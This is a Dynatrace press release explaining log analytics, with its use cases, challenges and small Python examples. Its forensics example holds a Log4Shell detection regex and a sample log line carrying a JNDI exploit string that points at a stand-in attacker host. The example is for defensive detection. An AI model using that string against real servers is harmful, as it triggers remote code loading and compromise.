Dynatrace Inc.

07/29/2022 | Press release

What is log analytics? How a modern observability approach provides critical business insight

Log analytics is the process of evaluating and interpreting log data so IT teams can quickly detect and resolve application and system issues.

What is log analytics?

Log analytics is the process of viewing, interpreting, and querying log data so developers and IT teams can quickly detect and resolve application and system issues. While an error message or application alert signals that something has gone wrong, it often takes an investigation to identify exactly what happened, in which part of the system, and how, so that teams can take action. This is also known as root-cause analysis.

Log analytics is useful for application performance monitoring in cloud, virtualized, and physical environments (including Kubernetes workloads), as well as for application security and business analytics. It's also common for teams, as part of their log monitoring practice, to write business metrics to a log that can then be tracked on a dashboard or used to trigger an alert.
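For example, a service might emit a business metric as a structured log line that a dashboard or alerting rule can later consume. Here is a minimal Python sketch, assuming JSON-formatted logs; the logger name, field names, and event name are illustrative, not a Dynatrace API:

```python
import json
import logging
import time

logging.basicConfig(level=logging.INFO, format="%(message)s")
log = logging.getLogger("checkout")  # hypothetical service name

def record_order(order_id: str, value_usd: float) -> None:
    # Emit the business metric as one structured (JSON) log line so a
    # log analytics pipeline can chart it or alert on it downstream.
    log.info(json.dumps({
        "timestamp": time.time(),
        "event": "order_completed",
        "order_id": order_id,
        "order_value_usd": value_usd,
    }))

record_order("A-1001", 42.50)
```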

At the same time, log analytics can present challenges as data volumes explode, particularly in traditional environments that lack end-to-end observability solutions. This is where having the proper log management solution can help teams manage costs, while ensuring they still have visibility into critical application environments.

In what follows, we explore log analytics benefits and challenges, as well as a modern observability approach to log analytics.

What are the use cases for log analytics?

As companies migrate their infrastructure and development workloads to the cloud, there are numerous use cases for log analytics. Consider the following ways teams can apply log analytics to on-premises and multicloud infrastructures:

Application deployment verification. As organizations move and manage their applications in the cloud, they need to be able to monitor the hosts, processes, services, and applications for performance issues in real time. A modern approach to log analytics enables IT teams to find applications that are failing to meet service-level objectives (SLOs).
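As a rough illustration, an SLO check over parsed access-log records might look like the sketch below; the 95%-of-requests-under-500-ms objective and the record format are assumptions made for the example:

```python
# Each record is (service, response_time_ms), as parsed from access logs.
RECORDS = [
    ("checkout", 120), ("checkout", 480), ("checkout", 900),
    ("search", 60), ("search", 70), ("search", 90),
]

def slo_violations(records, threshold_ms=500, target=0.95):
    """Return each service whose share of fast requests falls below the SLO."""
    totals, fast = {}, {}
    for service, ms in records:
        totals[service] = totals.get(service, 0) + 1
        if ms <= threshold_ms:
            fast[service] = fast.get(service, 0) + 1
    return {
        service: fast.get(service, 0) / totals[service]
        for service in totals
        if fast.get(service, 0) / totals[service] < target
    }

print(slo_violations(RECORDS))  # {'checkout': 0.666...} -> missing the SLO
```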

Fault isolation. If an application fails, log analytics can trace the error back to its source, enabling IT operations teams to pinpoint exactly where in the system the failure originated.
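One simplified version of that step is to filter error entries and group them by the component that emitted them; the log line format below is assumed purely for illustration:

```python
from collections import Counter

# Simplified log lines: "<timestamp> <level> <service> <message...>"
LOG_LINES = [
    "2022-07-29T13:00:01 ERROR payments connection refused to db-3",
    "2022-07-29T13:00:02 INFO frontend request served",
    "2022-07-29T13:00:03 ERROR payments connection refused to db-3",
    "2022-07-29T13:00:04 ERROR checkout upstream payments returned 500",
]

def likely_source(lines):
    """Count ERROR lines per service; the top emitter is a root-cause candidate."""
    errors = Counter(
        line.split()[2] for line in lines if line.split()[1] == "ERROR"
    )
    return errors.most_common(1)

print(likely_source(LOG_LINES))  # [('payments', 2)]
```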

Peak performance analysis. Log analytics can determine whether the same service or function is consistently causing an application to miss its SLOs during peak periods, for example, when a retailer runs an end-of-season sale or a financial application is critical for closing out the year. With the right log management and observability platform, IT teams can efficiently identify the root cause of problems during these peak times and maintain three nines of availability, or 99.9%.

Forensics. The ability to recover and investigate event logs and metadata enables organizations to identify the patterns threat actors leave when trying to exploit a vulnerability in their environment. In late 2021, for example, digital forensics was central to combating the Log4Shell vulnerability.
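In the Log4Shell case, a first-pass forensic sweep often meant scanning retained logs for JNDI lookup strings. A minimal sketch follows; note that this pattern catches only the unobfuscated form of the exploit string:

```python
import re

# Unobfuscated Log4Shell exploit attempts embed a ${jndi:...} lookup string.
JNDI_PATTERN = re.compile(r"\$\{jndi:(?:ldaps?|rmi|dns)://[^}]+\}", re.IGNORECASE)

SAMPLE_LOGS = [
    "GET /search?q=${jndi:ldap://attacker.example.com/a} HTTP/1.1",
    "GET /healthz HTTP/1.1",
]

for line in SAMPLE_LOGS:
    if JNDI_PATTERN.search(line):
        print("suspicious:", line)
```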

Better-quality code. As development and site reliability engineering (SRE) teams strive to release software faster, log analytics can provide key insight into software quality as part of a broader DevOps observability and automation initiative.

What are the challenges of log analytics?

For all these benefits, log analytics also presents challenges, especially as environments scale.

A lack of end-to-end observability. Observability requires the ability to measure a system's current state based on the data it generates. As environments encompass thousands of interdependent microservices distributed across multiple clouds and on premises, observability becomes increasingly difficult.

Data silos. As data proliferates in cloud environments, both the volume of data and the variety of formats grow. IT teams need access to historical and real-time data in an integrated, contextualized fashion so they can perform faster and more precise root-cause analysis. Unfortunately, many organizations have dozens of siloed data-collection and monitoring tools, and equally siloed teams.

Indexing overhead. Traditional databases help users and machines find data with a quick search. Databases, however, require indexing (building a data structure that speeds up retrieval) before log data can be searched and analyzed. Indexing is computationally expensive, multiplies the data, takes time, and consumes extra storage, all of which adds to the cost and overhead of traditional log management systems.

Indexing also requires an educated guess about which data will be needed for future analysis. Data scientists, by contrast, often prefer to work against the complete unstructured, unindexed data lake, even though doing so involves slower, more deliberate, and more complex techniques.
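The tradeoff is visible even in miniature. In the toy inverted index below, lookups become fast set intersections, but the index re-stores every token of every line, which is the storage and compute overhead described above (a sketch, not how any particular product indexes):

```python
from collections import defaultdict

LOG_LINES = [
    "ERROR payments timeout",
    "INFO frontend ok",
    "ERROR checkout timeout",
]

# Build an inverted index: token -> set of line numbers containing it.
index = defaultdict(set)
for n, line in enumerate(LOG_LINES):
    for token in line.lower().split():
        index[token].add(n)

# Lookups become fast set intersections...
hits = index["error"] & index["timeout"]
print([LOG_LINES[n] for n in sorted(hits)])

# ...but the index duplicates every token, which is the extra storage
# and compute the text describes.
print(sum(len(lines) for lines in index.values()), "postings for",
      len(LOG_LINES), "log lines")
```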

Cold storage and rehydration. Because data storage can be costly, organizations may opt to keep some data in cold, or inactive, storage; data they need to access only once a quarter or once a year can reside there. Teams must then rehydrate that data before they can reindex and query it. Modern log analytics allows teams to access data in real time and get precise answers without indexing it first, which can vastly reduce an organization's storage costs and improve data efficiency.
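Such an index-free, schema-on-read query can be pictured as a straight scan over raw JSON log lines at read time, with nothing built ahead of time; the field names here are assumptions for the example:

```python
import json

RAW_LOGS = """\
{"ts": "2022-07-29T13:00:01Z", "level": "ERROR", "service": "payments"}
{"ts": "2022-07-29T13:00:02Z", "level": "INFO", "service": "frontend"}
{"ts": "2022-07-29T13:00:03Z", "level": "ERROR", "service": "checkout"}
"""

def query(raw, **filters):
    """Scan every line at read time; nothing was indexed up front."""
    for line in raw.splitlines():
        record = json.loads(line)
        if all(record.get(key) == value for key, value in filters.items()):
            yield record

for match in query(RAW_LOGS, level="ERROR"):
    print(match["service"])  # payments, checkout
```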

Inadequate context. Logs are often collected in silos, with limited or no relationship to other data types, then correlated in meaningless ways. Without proper context and causation-based analytics, IT teams often sift through data without knowing whether two alerts are related or how they affect users. A modern observability platform approach can automatically contextualize logs and metrics with traces, topology, and user sessions.
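That kind of contextualization can be pictured as a join on a shared trace ID, so each log line sits next to the span and user session it belongs to. This is a toy sketch with made-up records; a real observability platform performs the join automatically and at scale:

```python
LOGS = [
    {"trace_id": "t1", "msg": "payment declined"},
    {"trace_id": "t2", "msg": "cache miss"},
]
SPANS = [
    {"trace_id": "t1", "service": "payments", "user_session": "s-42"},
    {"trace_id": "t2", "service": "search", "user_session": "s-77"},
]

# Index spans by trace ID, then attach that context to each log line.
spans_by_trace = {span["trace_id"]: span for span in SPANS}
for entry in LOGS:
    context = spans_by_trace.get(entry["trace_id"], {})
    print(entry["msg"], "->", context.get("service"), context.get("user_session"))
```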

Poor root-cause analysis. IT teams using siloed logging tools struggle to determine root cause, often because such tools can provide only simple correlation. What teams need instead is data in context that indicates not just correlation but causation. Without causation, it's difficult to reduce mean time to repair (MTTR), and critical staff get tied up in war rooms trying to identify the problem.

Difficulty understanding business impact. Because digital systems are the engine of every modern organization, log analysis provides critical insight for data-driven business decisions. Without observability, context, and precision, traditional log monitoring generates many alerts but little insight into their causes. These tools cannot directly reveal how applications, services, or even code changes affect users and business outcomes. The quicker a DevOps team can identify the recent software build that introduced an issue, the sooner it can roll back the change and restore service, manually or with an automated process.

High cost and blind spots. To avoid the high data-ingest costs of traditional log monitoring solutions, many organizations exclude portions of their logs, leaving only a minimal sample to analyze. Although cold storage and rehydration can mitigate the cost, that approach is inefficient and creates blind spots exactly when teams need visibility most.

An automatic and intelligent approach to log analytics

Modern observability platforms like Dynatrace enable log management and log analytics by strategically and cost-effectively aggregating data from many silos. Such a platform provides the context and query capabilities developers, IT, and security teams need to quickly identify and understand the root cause of events. Having these insights available for decision-making improves collaboration and focuses resources so teams can remediate issues quickly. Combining contextual AI with log analytics enables organizations to derive real-time insights about performance issues, cybersecurity threats, and end-user problems.

Visit our website to learn more about log analytics and log monitoring at Dynatrace.